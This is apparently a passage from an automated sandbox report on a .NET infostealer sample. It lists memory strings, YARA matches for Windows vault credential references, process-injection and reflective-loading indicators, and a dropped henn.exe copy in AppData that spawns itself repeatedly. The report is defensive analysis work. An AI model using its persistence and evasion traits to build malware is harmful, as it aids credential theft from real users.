00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, aXzTh9Yxb3.cs.Net Code: Vm9YYeYjz6

                    System Summary

                    barindex
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 24.2.henn.exe.21593116bc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c63406e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 24_2_00007FF848F9F819 NtUnmapViewOfSection,24_2_00007FF848F9F819
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeCode function: 0_2_00007FF848F238080_2_00007FF848F23808
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeCode function: 0_2_00007FF848F238D30_2_00007FF848F238D3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeCode function: 0_2_00007FF848F270E80_2_00007FF848F270E8
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 12_2_00007FF848F4380812_2_00007FF848F43808
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 12_2_00007FF848F438D312_2_00007FF848F438D3
                    Source: C:\Users\user\AppData\Roaming\henn.exeCode function: 12_2_00007FF848F470E812_2_00007FF848F470E8
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b42f1cf-ea9d-46ae-bffe-aabc91b3c0ee.exe4 vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133839538.0000017C63220000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWtzmhh.dll" vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73434000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b42f1cf-ea9d-46ae-bffe-aabc91b3c0ee.exe4 vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000000.2093353422.0000017C61624000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametin tin.exe" vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeBinary or memory string: OriginalFilenametin tin.exe" vs SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 24.2.henn.exe.21593116bc0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c63406e58.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, oH693OIIGFg.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, 1jwN8Qsp0hs.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, BOM.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, SN5.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, cpjKUanB.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, IicScPhBvUG.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c734498b8.5.raw.unpack, dyn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@63/4@0/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeFile created: C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\henn.exe "C:\Users\user\AppData\Roaming\henn.exe"
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe "C:\Users\user\AppData\Roaming\henn.exe"
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exe
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\henn.exeProcess created: C:\Users\user\AppData\Roaming\henn.exe C:\Users\user\AppData\Roaming\henn.exeJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2133922977.0000017C63332000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73301000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134715350.0000017C7BB30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, 00000000.00000002.2134316901.0000017C73379000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 0000000C.00000002.2285133162.000001D7BC9A2000.00000004.00000800.00020000.00000000.sdmp, henn.exe, 00000018.00000002.2350909702.000002159309E000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: henn.exe.0.dr, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73379ae8.6.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73379ae8.6.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exe.17c73379ae8.6.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
